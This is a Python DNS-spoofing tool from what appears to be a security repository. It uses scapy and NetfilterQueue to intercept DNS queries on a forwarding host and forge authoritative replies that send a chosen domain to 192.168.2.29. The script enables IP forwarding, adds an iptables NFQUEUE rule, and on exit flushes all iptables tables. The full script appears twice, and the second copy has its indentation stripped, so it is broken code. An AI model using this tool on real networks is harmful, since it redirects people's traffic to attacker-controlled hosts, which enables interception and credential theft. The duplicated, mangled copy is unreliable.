BLTSEC/scapy-dnsspoof.py

## scapy-dnsspoof.py
#!/usr/bin/env python3
from scapy.all import *
from netfilterqueue import NetfilterQueue
import os


def modify(packet):
    domain = b'bltsec'
    pkt = IP(packet.get_payload()) #converts the raw packet to a scapy compatible string

    #modify the packet all you want here
    if pkt.haslayer(DNSQR):
        print((pkt[DNS].qd.qname).decode('utf-8'))
        if domain in pkt[DNS].qd.qname:
            print('It does have it***********************')
            spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                          UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                          DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                          an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata='192.168.2.29'))
            packet.set_payload(bytes(spoofed_pkt)) #set the packet content to our modified version
            print('[+] Sent spoofed packet for %s' % domain)
    packet.accept() #accept the packet

if __name__ == '__main__':
    with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
        file.write(str(1))
        file.close()
    os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
    nfqueue = NetfilterQueue()
    #1 is the iptabels rule queue number, modify is the callback function
    nfqueue.bind(1, modify)

    try:
        print('[*] waiting for data...')
        nfqueue.run()
    except KeyboardInterrupt:
        print('\nExiting...')
        nfqueue.unbind()
        with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
            file.write(str(0))
            file.close()
        os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
	#!/usr/bin/env python3
	from scapy.all import *
	from netfilterqueue import NetfilterQueue
	import os


	def modify(packet):
	domain = b'bltsec'
	pkt = IP(packet.get_payload()) #converts the raw packet to a scapy compatible string

	#modify the packet all you want here
	if pkt.haslayer(DNSQR):
	print((pkt[DNS].qd.qname).decode('utf-8'))
	if domain in pkt[DNS].qd.qname:
	print('It does have it***********************')
	spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
	UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
	DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
	an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata='192.168.2.29'))
	packet.set_payload(bytes(spoofed_pkt)) #set the packet content to our modified version
	print('[+] Sent spoofed packet for %s' % domain)
	packet.accept() #accept the packet

	if __name__ == '__main__':
	with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
	file.write(str(1))
	file.close()
	os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
	nfqueue = NetfilterQueue()
	#1 is the iptabels rule queue number, modify is the callback function
	nfqueue.bind(1, modify)

	try:
	print('[*] waiting for data...')
	nfqueue.run()
	except KeyboardInterrupt:
	print('\nExiting...')
	nfqueue.unbind()
	with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
	file.write(str(0))
	file.close()
	os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')